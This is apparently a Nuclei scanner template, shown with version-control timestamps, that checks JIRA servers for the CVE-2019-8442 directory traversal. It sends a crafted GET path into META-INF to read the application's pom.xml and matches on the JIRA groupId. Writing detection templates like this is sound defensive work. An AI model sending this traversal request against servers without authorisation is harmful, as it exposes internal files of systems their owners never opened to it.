2020-10-02 19:50:52 +00:00
|
|
|
id: cve-2019-8442
|
|
|
|
|
info:
|
|
|
|
|
name: JIRA Directory Traversal
|
|
|
|
|
author: Kishore Krishna (siLLyDaddy)
|
|
|
|
|
severity: medium
|
|
|
|
|
requests:
|
|
|
|
|
- method: GET
|
|
|
|
|
path:
|
|
|
|
|
- >-
|
|
|
|
|
{{BaseURL}}/s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
|
|
|
|
|
matchers-condition: and
|
|
|
|
|
matchers:
|
|
|
|
|
- type: status
|
|
|
|
|
status:
|
|
|
|
|
- 200
|
|
|
|
|
- type: word
|
|
|
|
|
words:
|
2020-10-03 05:57:10 +00:00
|
|
|
- <groupId>com.atlassian.jira</groupId>
|
2020-10-02 19:50:52 +00:00
|
|
|
part: body
|
